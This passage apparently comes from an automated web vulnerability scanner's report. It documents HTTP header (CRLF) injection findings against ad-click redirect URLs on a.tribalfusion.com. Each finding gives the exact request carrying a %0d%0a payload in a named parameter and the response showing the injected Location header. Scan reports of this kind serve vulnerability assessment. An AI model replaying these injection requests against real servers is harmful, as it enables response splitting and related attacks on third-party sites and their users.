GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=4af06%0d%0a498f542876a HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=alnhU0tZdPZcF1yXLorgh2gDsJ6EfHqYqyZcq0Za0gYKSon6hLln9VN5CjYQLIvaqNX7BJrGTu7oWFJt5ZcLZdTuMLKSE0nLHBNxhQaVZdQck7romZc1aaERGmh7u6y9bvCuUOJKikC5fWofR3c9ECUZdZcHvg2jPOAANlCuvK5ZavL4joAqCtbIgvFP20Hl9J3pI9ICSZaMepZatsShLwEvvKdBTX7Xo9k4yLZaGxfZcA8hClG4QS1heB3uELwrZdNK80CSljd0Cp9fWU7NaE0rtqEQ7lC2fo4KXrCJ6OcmTNUH8X7L7g8hfmxZc4B6eDkHAiDGha8UNQbv53Kn3v56m87ZbcmxnQtoV71mtrmdb2jZdbZc7yKlZbjWhyTBFo3xL3nSIuE1slKkPLlmZcHtk1DwTrmcmhan4to68kdQnNZcrbeDYlOZaYNmI2I6BfY6JlZak1AVZb4xFZbFveZaZdkkNoMCJu9L8Dm38ItxV6tRsQuS4kgu1; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:44 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=4af06
498f542876a
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the dcp request parameter is copied into the Location response header. The payload 6aeb8%0d%0adcca9fab7ae was submitted in the dcp parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=6aeb8%0d%0adcca9fab7ae&dcc=39972439.232434380&dcn=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aNnhU0yg6sI52wmmU6HI7HR1JDV8uGw5mRuxpvZd32JVgvOvr153RO9DP1oSRmAKrWVj8F08fA5y4rK25UdQpfHZd4ZaCZcp5bISC9dSPpaLiigZdTLGrXOb5FEEVtP4VmUcejTBCZavCPP4NdlUkhg4XfBJEgSVRxsiSe668A8d5inGZanlpmw9vYUk8Zdw8YNIkepPDDh5YGCZdMVPZa80Q1PaHkmNZd2XZcb32qOi9DqJsSI7F6gZbZatPDA3TSYkHsZbltXcFxNpZbdC9qGi2UwOZaEKrltoFhZcZa6F3uaxcWvsHHgZbdwa36KShbEvmmiDND43mDdcEq4PNF6Dj3A3WG5JcEchnhp8qxndmst9pFkpSBBKIalUR25GQp2hitKbn0CKb0Tl3bZa7ZbLrYB953ZcJgjgN2hZa5YqiCJ9nJNZaaLOh1Cu5wPClSRHjl2yIHXEQKlSZd11gbqGIY08g35tslaCiwb8S6arCbbK9sVfGs; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:10 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=6aeb8
dcca9fab7ae&dcc=39972439.232434380&dcn=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d9f87%0d%0aa0e3ab0b09a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r?d9f87%0d%0aa0e3ab0b09a=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aPnhU0wZcFjEXEOM7jSDlfAQ1ZbZb3UeuMZaqVrIltC5UVV5rAvH534PLakAVnTpeHFb1F98Qxl1mZd2OmxWj78S8nA71FudRK686DYcmu3ewf4hOaKFdbHfZcMFFW1e3F2EZbu6pkLMJZbA6DOPHVZc44q5RvLZa1DZdVX061iaBZco4s4EblZbcNU4gGkP1AeewonJS6KdsZdRl3nZci0prKxax03rMkWh56vdu91n3x7HeToXyiEfUcXJcYwYXZbM0E6iF2eSEv3KUgSZbvNcA8rIKrkg3GkZaLkGZcaFrUWWCcpscoXSPZckGgosNuOmB16V6mx5WH8kSOW2GtOMSVrhXGMmmmf93SFvtEJLVtOAGnDZbycnAxguZaAXFftwq7bWbwXasqwWGJSa6ZdMp2sWFYS4k9xDcXvf3ZdiUUxcHJJQxnEjpF2fxHtoaul7d7RGg46nKkZcJZaIhUUZbJgvCOEodGYElq0bWBY6ZchpYJZcDyaBg; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:23 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r?d9f87
a0e3ab0b09a=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the vehicle request parameter is copied into the Location response header. The payload 3441b%0d%0a47ca73b60ee was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=3441b%0d%0a47ca73b60ee&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aDnhU0rwZaKIxE7MBU8ZaerouLiJ5826v52jqItWZaLZbQ0gnbyo9ETmZdZaE8GKrBBLDB569AfrbYXmxZbmQ2InvSCJFiaY7IYfGfqX5swJvKZdp7ZdFCVZb61Rfu9r1jnAZbhyOyuGle80oO2C3y0N910MHZcfTs46VhRFH0RXrZdlx8HHjHRM8dfgRs0jTZaZaX0H0gIkqQVMsDaCoAdZbas6eZafZanqwY4Y40AW5X1Tt5cpk3htnZa2ZaSKEvmvJi1geI9NZadS62NlD4Bdm8QxZdEqrVZdZbHqeKi9ggi1x9FNQfojMEh5fsVehITF4DHXrHIYgGlyYCl0NBFe37Xt5xcPogoM8N1Kc5YME1W8VD4XyGqrZaIWnrSOPsVGjXDwZbkFNSZaml7105LlX0s35yUuXcuxQ4gQWQxPC8cTNZate8Zc3fALTXsQ8ZcgrLvoilfgngWJtAomHMsAuraV5YO7XPPZcWgslTwbMan6xX9rwNQfOjl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:54 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=3441b
47ca73b60ee&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the ;ord request parameter is copied into the Location response header. The payload 655ab%0d%0a1d53ab93dd7 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=655ab%0d%0a1d53ab93dd7 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aEnFciRZdySO6IUMNYGxOjh1oBlrc7bJ8Za02ysiOlWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57hx8oxxAiGZdrQEXCZaR7FrYnMtHwupjfTDQiGiqm8iEycb5nvPObadwxjWHKmTpbGD3MJ7s6Zd4rA8o6BM3NWGePpwOROZaRayI2ViRdmAgwQqylWxErRDewU9PgUNWnG0ukqYlaV7SkBp6sZcIUfWMHtYNv310haoLJ4SnKtJCZcnIcbEZd2HZdPAje8l1WviCrsIaG6nXSZdw9ZdIQHZbUxx9aZbL4xZayRZbbPZdh0vGLy5GnFb0Zb10GLjZaZdHb77YxKIyCOkIZdr14CDlqeURKpfMfRMqXDlu7ZbMv5QZa4CNuGSpTGL4a2tPQmfYJOVGQ7algAjGBRWVtTgg3NcbKTucbm5EStECUMGKmC4tNq0y0VvppiIU9G28HK8tZa55i1nMcsZdynb3ZaHktNmQmq7BfeK6ZaQ2f3Jc3JWHsEptllZbjYQwGDOZb6uCZcts9KtsFTjNMyCQU7wBuRLaJSNZayiIrOE1G02Zb; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:51 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=655ab
1d53ab93dd7
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 10 is copied into the Location response header. The payload da34d%0d%0ab1265b79bf1 was submitted in the REST URL parameter 10. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/da34d%0d%0ab1265b79bf1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aanFkjx2eNrpE0UkbavNMSSSQpRoMvASy8X3GJ4XhBRZcUgGD3MVcFVRdE4xUQSg6gfI2a8VEZcH5gck1pFJMoroqUgULWVwBf0JsbkEU1jaDYwZcx9PgB4schU1Zbk5ZdZbsM2GG0m8KIk5567gsSBNeMZbUghQ0YjgZcoPgCI2gPunanNHI2OxXBJhEZcOUxQ4ZaBfm95ZdpCS2CpZbKvTVJWo5uMZajJ8iBMw5K6upK50DImU2rItRXhOBPZbQlDpBJyjvy5loBtvZdCAxd1BE3kLunkFOY1x2wgYCqbVhApNJZaHU7khxxwnrgGIWju4ZcQFZcnOZcGZcMHwqCqgrJPXBfDT6on99VxUxRB2yGX1AjlOVY4hBKm6n6X8I92UABhwrDhoy0r62GtYfOrGyoJMCV8gvf67HCZaNhqShkcZbyxr3YBQFlCeNRKPadZbIpSf1MnLX7ReGoCYrZbcm2xqRaxdyA7xSPst7Za0fk5fKZdSfxt8mVRV688LZbllgQt2HfapgHKUOLEHBRhBTJIZbw2NX89yO1osZbwscUfSWNdblGdosM5ZbiphnxvGrqGpBq8nQgXbPDPbXgBLXDnq51OEDB2Q2L; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:48 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/da34d
b1265b79bf1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 11 is copied into the Location response header. The payload 845ac%0d%0a5c1762bceb0 was submitted in the REST URL parameter 11. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/845ac%0d%0a5c1762bceb0/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=alnFkjtZdPuoP7SpZcnDoOn6TC7uVaZblA87K1ygXXv1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgcN17mim2cl70fJkJwnjyrRiaFjJTj5AlqOgFxPsTZdKcBPPFy1E6fwLqpGxi9onku2jjrqPS7qCZdNfnbJO7GERA1QwZbrkeuZaUT1wAnc8ySSuWOL3Jtpb9Rcu3S39uIXFNn01LQaWZdC9iyhIvC0ZbknWZcQXR0tlMxfJmpcMAC97ZdcvmeKLQODif6ZdG7y2dtZciYpLmWLH0mjVjPOXX3MBcI2YQcHNQZcsZaZdX7YeKSj48iyZcUDrRBDTSmZd4aJ38gveZboIMMBIgnIFbUpjKgyCAHxrO96gX7klrT5OS6cudQZaUy1ZaVaVYZaEFB6FZdjnLhuFrFYvlbOQiUUk4ZcTDkYttD7XZaDGajIsgLvlebqYK2PHoDv9IWqFZbuwFmRF2SPC4OMKyU94XrvgGkFCvR97FTysJmnSME7g5rZdT8FgxjZdZaf5AABcIZbVgrR45GpT1cwOTL4ku3u93rh5rxwlnqgas7; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:03 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/845ac
5c1762bceb0/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
